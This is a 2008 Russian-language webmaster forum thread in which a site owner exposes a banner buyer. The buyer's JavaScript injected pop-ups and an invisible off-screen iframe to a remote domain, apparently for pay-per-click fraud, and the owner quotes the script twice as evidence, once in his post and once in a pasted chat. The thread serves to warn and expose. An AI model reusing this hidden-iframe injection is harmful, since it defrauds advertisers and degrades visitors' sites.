Реклама на сайте Advertise with us

Linoge ICQ 230-267-138

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 07.11.06
Сообщения: 47
Рейтинг: 18

Ссылка на сообщениеДобавлено: 04/06/08 в 12:56       Ответить с цитатойцитата 

Итак все по порядку в деталях, не поленитесь прочитать, интересно.

Стукнулся ко мне Linoge и говорит, давай я баннерное место на твоих сиджах куплю, АФФ баннер повешу. Я думаю почему бы и не продать, вроде чел нормальный, да и копеечка не помешает.
Договорились о цене и размере 700 на 150. Я попросил баннер не менять, доверился челу, позволил через яваскрипт подгружать, типо для учета статистики.

Захожу через время на свой сидж, сморю, а баннер другой и в 2 раза большего размера, стукнул Linoge, так тот еще меня обвинять начал в том, что над его баннером мой висит, который там висел и до того, как мы договорились.
Но в итоге разобрались, баннер сменил.

Начал у меня самый крупный сидж падать (остальные не смотрел, тоже самое думаю), прода просела, ну думаю наверное траф просел и еще что-то. А он падает и падает, короче выяснилось, что это скрипт Linoge его грузит. Стукаю, говорю так и так, он мне в ответ: скрипт смени, я всем сказал об этом, ну я сменил, в конце концов есть договоренность и надо показывать его баннер.

А дальше начинается самое интересное:

Дата центр в котором находиться мой сервак, обновил днс, а мой провайдер стормозил, ну немогу попасть на сидж, взял америкосовский впн, захожу на сидж и чуть со стула не упал: 3 попапа и херня какая-то грузиться все время.

Итог: сидж слетел на 25К, слава богу меня не побанили трейдеры.

доказательства тут
http://www.cjlog.com/search.html?q=newsexworld.com&is_movies=Al…;niche=All

смотреть Java-Scripts, Iframes

document.write("<div id='tizbanner'>"); document.write("<iframe src='http://promo.cams.com/promo/camgirlsliveiframe.jsp?pid=g865402-pct&no_click=1&
;num=7&size=s' scrolling='no' align='middle' width='640' height='175' frameborder='no'></iframe>"); document.write("</div>"); docu
ment.write("<script src='http://www.linbanners.net/banners/show/showbanner9577274.php' type='text/javascript'></script>");
function showbanner(text) {content=document.getelementbyid("tizbanner").innerhtml;content+=text;document.g
etelementbyid("tizbanner").innerhtml=content;}showbanner("<div style='position: absolute; left:-100%; top:0%; width:100%; height:100%;'><iframe style='width:100%;height:100%' width='100%' scrolling='no' frameborder='no' marginwidth='0' marginheight='0' src='http://dabestdomain.info/in.cgi?8&parameter=bigk'></iframe></div>&
quot;);

стукнул Linoge, он ничего не отрицает, ему кажется, что так можно и нужно делать...

ИМХО эта херня делает фейковые клики на PPC, так что, если этот пост читают представители PPC, очень рекомендую проверить траффик акка Linoge, и принять соответсвующие меры, если я прав.

Выводы делайте сами...

0
 



С нами с 22.01.04
Сообщения: 1037
Рейтинг: 694

Ссылка на сообщениеДобавлено: 04/06/08 в 13:15       Ответить с цитатойцитата 

bigkromka писал:

стукнул Linoge, он ничего не отрицает, ему кажется, что так можно и нужно делать...

Получается он тебе попапы повесил и ему кажется, что так можно делать?
Я правильно понял, что он там только по некоторым странам показывал это, поэтому ты сразу и не заметил? Вообще если все так как ты говоришь, хуевая затея... Не только тебе было херово но и твоим трейдерам. Сочувствую.

3
 



С нами с 07.11.06
Сообщения: 47
Рейтинг: 18

Ссылка на сообщениеДобавлено: 04/06/08 в 13:32       Ответить с цитатойцитата 

именно так, попапы и еще какая то хрень для америки точно, но думаю для всех платежеспособных стран которые принимают PPC, причем только уникальные IP, хитрый жук

мне просто повезло, что заметил

0
 



С нами с 22.09.06
Сообщения: 9
Рейтинг: 3

Ссылка на сообщениеДобавлено: 04/06/08 в 13:32       Ответить с цитатойцитата 

Почти тоже самое.
Договорился про размещение на всем нетворке. С оплатой вперед.
Деньги не большие, но думал банер внизу особо не помешает.
Повесил сразу на один сайт проверить что да как. На следующий же день увидел кучу хрени подгружавшейся вместе с банером.
Около 20 сёрчей. Плюс непонятно откуда взявшийся редирект на ебай.
Серчпаги я еще мог бы стерпеть, но если они появились (хотя о них не было ни слова), то подумал, что может появиться всякое...
Обратился с предложением оставить только банер без фрейма - отказ.
Вернул бабки - не жалею.
Каждый решает конечно для себя вешать или нет, но я думаю, что на чистых сиджах такого не должно быть.

0
 



С нами с 22.01.04
Сообщения: 1037
Рейтинг: 694

Ссылка на сообщениеДобавлено: 04/06/08 в 13:36       Ответить с цитатойцитата 

DocSS писал:
Почти тоже самое.
Договорился про размещение на всем нетворке. С оплатой вперед.
Деньги не большие, но думал банер внизу особо не помешает.
Повесил сразу на один сайт проверить что да как. На следующий же день увидел кучу хрени подгружавшейся вместе с банером.
Около 20 сёрчей. Плюс непонятно откуда взявшийся редирект на ебай.
Серчпаги я еще мог бы стерпеть, но если они появились (хотя о них не было ни слова), то подумал, что может появиться всякое...
Обратился с предложением оставить только банер без фрейма - отказ.
Вернул бабки - не жалею.
Каждый решает конечно для себя вешать или нет, но я думаю, что на чистых сиджах такого не должно быть.

Что значит решает? Был я так понимаю разговор за баннер от АФФ. А если появилось что-то еще, то это форменное наебалово. Мало того, что в сиджах попапы запрещены, и все это знают. И ставить такое, это подставлять людей. А если на русском - наебывать.
Вопрос остается открытый, и много ли таких кто поставил это и щас не знает даже, что крутит?

0
 



С нами с 07.11.06
Сообщения: 47
Рейтинг: 18

Ссылка на сообщениеДобавлено: 04/06/08 в 13:39       Ответить с цитатойцитата 

дело в том, что речь шла изначально про баннер АФФ и только, он просто наЁ... парнеров, нет доверия к такому человеку

Последний раз редактировалось: bigkromka (05/06/08 в 00:50), всего редактировалось 1 раз

0
 



С нами с 08.02.03
Сообщения: 10555
Рейтинг: 5957


Передовик Master-X (01.06.2018) Передовик Master-X (16.06.2019) Передовик Master-X (01.04.2020) Передовик Master-X (16.04.2020) Передовик Master-X (16.10.2021) Ветеран трепа Master-X (01.11.2021)
Ссылка на сообщениеДобавлено: 04/06/08 в 13:41       Ответить с цитатойцитата 

Народ вроде вы все вменяемые люди, а на такой старый развод повелись ;(

0
 

Old Oil Barrel

С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265


Передовик Master-X (16.07.2005) Передовик Master-X (16.10.2005) Передовик Master-X (01.12.2006) Передовик Master-X (01.03.2007) Передовик Master-X (16.03.2007) Ветеран трепа Master-X ()
Ссылка на сообщениеДобавлено: 04/06/08 в 13:45       Ответить с цитатойцитата 

продовай банеры - СПОТЫ проверенным людям, например партнерке AWE они выкупают споты в зависимости от твоего трафа

а вообще
стремно все это свои же на мастере друг друга наебывают

Правило буравчика

0
 



С нами с 07.11.06
Сообщения: 47
Рейтинг: 18

Ссылка на сообщениеДобавлено: 04/06/08 в 13:47       Ответить с цитатойцитата 

уже продал спот AWE icon_smile.gif

0
 



С нами с 22.09.06
Сообщения: 9
Рейтинг: 3

Ссылка на сообщениеДобавлено: 04/06/08 в 13:51       Ответить с цитатойцитата 

Ziegfrid писал:
разговор за баннер от АФФ

Ну тут как, тоже ведь висит на сайте его инфа, что будет вот такой вот банер, а что с ним будет вместе грузиться - не написано icon_smile.gif
кстати - http://linotraff.com - заодно и реклама ему. Пусть его хитботы кормят теперь. icon_smile.gif

Ziegfrid писал:
Мало того, что в сиджах попапы запрещены, и все это знают

Про попапы я не писал, потому как не видел.

JM писал:
на такой старый развод повелись ;(

Развод-то старый, но подход новый icon_smile.gif Внаглую и добросовестно стучаться в овнерам хороших сиджей.

0
 



С нами с 22.01.04
Сообщения: 1037
Рейтинг: 694

Ссылка на сообщениеДобавлено: 04/06/08 в 13:53       Ответить с цитатойцитата 

Sergeyka писал:

а вообще
стремно все это свои же на мастере друг друга наебывают

+1.
Ладно бы нюб какой-то. Плохая тенденция.

3
 



С нами с 01.04.04
Сообщения: 354
Рейтинг: 278

Ссылка на сообщениеДобавлено: 04/06/08 в 13:58       Ответить с цитатойцитата 

ТС - сочуствую.
Я так и думал что персонаж что нибудь да отмочит с этими выкупами. Сам не повелся.

Купи/продай свой траффик ICOOCASH2

0
 



С нами с 07.11.06
Сообщения: 47
Рейтинг: 18

Ссылка на сообщениеДобавлено: 04/06/08 в 14:05       Ответить с цитатойцитата 

по поводу сиджиков, он их продал другому челу, которого я знаю, трейд налажен

0
 
+ + +


С нами с 11.11.05
Сообщения: 580
Рейтинг: 416

Ссылка на сообщениеДобавлено: 04/06/08 в 14:15       Ответить с цитатойцитата 

Похоже человек обиделся на сиджи icon_smile.gif

0
 



С нами с 10.01.04
Сообщения: 356
Рейтинг: 362

Ссылка на сообщениеДобавлено: 04/06/08 в 14:21       Ответить с цитатойцитата 

Ко мне тожее стучался, подозрительно как-то было, в обшем не повёлся я.

0
 



С нами с 07.11.06
Сообщения: 47
Рейтинг: 18

Ссылка на сообщениеДобавлено: 04/06/08 в 14:23       Ответить с цитатойцитата 

ага и решил сиджеводов наебать по полной icon_smile.gif

надоело мне молчать когда меня наебывают
реально надо что бы народ знал "таких героев"

http://www.armadaboard.com/articles171.htm

положительный пример ньюбам, пипец у меня нет слов...

0
 



С нами с 04.05.06
Сообщения: 3180
Рейтинг: 1379

Ссылка на сообщениеДобавлено: 04/06/08 в 14:45       Ответить с цитатойцитата 

хотелось бы его услышать по этому поводу
вроде адекватный чел
тоже предлагал

0
 



С нами с 07.11.06
Сообщения: 47
Рейтинг: 18

Ссылка на сообщениеДобавлено: 04/06/08 в 15:05       Ответить с цитатойцитата 

чуть не забыл, что бы развеять сомнения об адекватности
цитата из аськи

bigkromka (02:13:07 4/06/2008)
привет, почему когда заходишь на мой сайт с твоим баннером под американским ай пи говно всякое грузиться безперебойно? типа кликов или еще какой хуйни? прошу ответа подробно, иначе на мастер-х, и в другие форумы с доказательствами по полной, есть онлайн сервисы которые фиксируют скрипты на сайтах, и куда они ведут

bigkromka (02:49:14 4/06/2008)
это так на вякий случай
document.write("<div id='tizbanner'>"); document.write("<iframe src='http://promo.cams.com/promo/camgirlsliveiframe.jsp?pid=g865402-pct&no_click=1&
;num=7&size=s' scrolling='no' align='middle' width='640' height='175' frameborder='no'></iframe>"); document.write("</div>"); docu
ment.write("<script src='http://www.linbanners.net/banners/show/showbanner9577274.php' type='text/javascript'></script>");

bigkromka (02:50:27 4/06/2008)
и это
function showbanner(text) {content=document.getelementbyid("tizbanner").innerhtml;content+=text;document.g
etelementbyid("tizbanner").innerhtml=content;}showbanner("<div style='position: absolute; left:-100%; top:0%; width:100%; height:100%;'><iframe style='width:100%;height:100%' width='100%' scrolling='no' frameborder='no' marginwidth='0' marginheight='0' src='http://dabestdomain.info/in.cgi?8&parameter=bigk'></iframe></div>&
quot;);

Linoge (11:06:59 4/06/2008)
04/06/2008 (06:10 GMT +02:00)
привет! экспов там нет как я и говорил и ничего, что гасит проду или сидж, я открываю некоторые сайты под накрутку некоторых систем, скажем так, но сиджи от этого не страдают, кроме этого, тот код который ты привел, ты привел код аффа icon_smile.gif вобщем-то смотри сам, если так смущает открытие сайта в невидимом фрейме (прошу заметить сайта без экспов и прочей гадости), то я делаю выплату и расстаемся.

Linoge (11:15:51 4/06/2008)
да и кстати все почему-то знали, что ппцшку свою поднимаем, но всем пох icon_smile.gif

Linoge (11:17:13 4/06/2008)
если что буду позже, пиши сюда отвечу

bigkromka (11:38:11 4/06/2008)
1. ты мне свалил сайт своим скриптами на 25К
2. ты меня обманул, и мне не пох когда 3 попапа с моего сиджа

короче на мастер исправлять твою репутацию


Вопрос:
Он всем к кому стукался говорил, что подгружать будет, что-то в невидимом фрейме и PPC поднимать?

0
 



С нами с 22.09.06
Сообщения: 9
Рейтинг: 3

Ссылка на сообщениеДобавлено: 04/06/08 в 15:25       Ответить с цитатойцитата 

bigkromka писал:
Он всем к кому стукался говорил, что подгружать будет, что-то в невидимом фрейме и PPC поднимать?


Нет, изначально речь шла только о банере АФФа. Только потом когда высказывались претензии, тогда сообщал, типа как само-собой разумеющееся.

Сейчас говорит, что всех предупреждает овнеров, но меня не предупреждал. icon_smile.gif

0
 



С нами с 20.10.04
Сообщения: 3851
Рейтинг: 1044


Передовик Master-X (01.03.2020)
Ссылка на сообщениеДобавлено: 04/06/08 в 15:26       Ответить с цитатойцитата 

стучался. Разговор был только про АФФ. Про ППЦ ничего не было.
был понт об уже установленных баннерах на больших известных сетках. гы.

повесил на тесты. с русского ИП все чисто, с амерской прокси - куча говна.
ППЦ, еще чо-то, какие-то редиректы и прочая муть.
при подгрузке говнеца засвечен доменчик, например, вот такой - yx0banners точка com

прода вниз, траф вниз.

при вопросе в асе "шозанах" - диалог, практически идентичный, как у ТС.

хрень снята, деньги выплачены.

перед тем, как повесить баннер, я пытался пробить асю по гуглу.. не нашел ничо подозрительного, это и подвело. теперь гугл вроде должен узнать героев =)

P.S.
В последнюю неделю две активизировались какие-то деятели, покупающие ифрейм. Системы те же, админки те же, подход тот же, но некоторые озвучивают конкретно прокрутку fraud PPC.
Коллеги, не ведитесь, лажа редкостная, сиджи валит на раз.

0
 



С нами с 07.08.07
Сообщения: 222
Рейтинг: 111

Ссылка на сообщениеДобавлено: 04/06/08 в 15:50       Ответить с цитатойцитата 

а что значит поднимать свою ппц?
наебывать фидпровайдеров что ли?

0
 



С нами с 07.11.06
Сообщения: 47
Рейтинг: 18

Ссылка на сообщениеДобавлено: 04/06/08 в 16:08       Ответить с цитатойцитата 

Народ, у бывших сиджей Linoge новый овнер,
хороший чел, не надо банить его сиджи под шумок, а то он перепугался бедный, под раздачу не за что попасть icon_smile.gif

0
 



С нами с 07.11.06
Сообщения: 47
Рейтинг: 18

Ссылка на сообщениеДобавлено: 04/06/08 в 16:22       Ответить с цитатойцитата 

ruffy писал:
а что значит поднимать свою ппц?
наебывать фидпровайдеров что ли?


ИМХО да

Надеюсь, овнеры PPC(фидпровайдеры) после информации в этом топике, проверят его акки на вшивость и забанят нах, если есть конечно за что

да, да злой я сегодня icon_smile.gif

0
 



С нами с 22.01.04
Сообщения: 1037
Рейтинг: 694

Ссылка на сообщениеДобавлено: 04/06/08 в 16:27       Ответить с цитатойцитата 

bigkromka писал:
ИМХО да

Надеюсь, овнеры PPC(фидпровайдеры) после информации в этом топике, проверят его акки на вшивость и забанят нах, если есть конечно за что

да, да злой я сегодня icon_smile.gif

Ни хуя не злой. Правильно, что сказал, я так понимаю, тут еще не все отметились кто ставил это гавно.

3
 



С нами с 25.08.03
Сообщения: 434
Рейтинг: 176

Ссылка на сообщениеДобавлено: 04/06/08 в 17:05       Ответить с цитатойцитата 

фууух, такс, ну давайте поговорим, мои обещания были, что:
никакой адвары
экспов
попапов и прочего говна
поначалу баннер действительно грузился яваксриптом, но потом многие овнеры сказали мне, что неплохо бы поменять на ифрейм, т.к. в случае если отдача происходила яваскриптом, то сначала грузился баннер (т.е. выполнялся скрипт), а потом сидж и у некоторых людей разумеется упала прода, поменяли на ифрейм, народ доволен, прод непадает, загрузка как и была по времени без баннера.
теперь о бигкромке, человек очень зол, что у него упал сидж, виноват я (по его словам), ну не я, а мой баннер.
попапов я там не нашел, траффик мой владельцев ппц прошу проверить внимательно icon_smile.gif
ну что еще сказать? давайте все дружно искать там экспы или еще что-то

Генерация текста - 1000 статей = $3

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор сайта

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »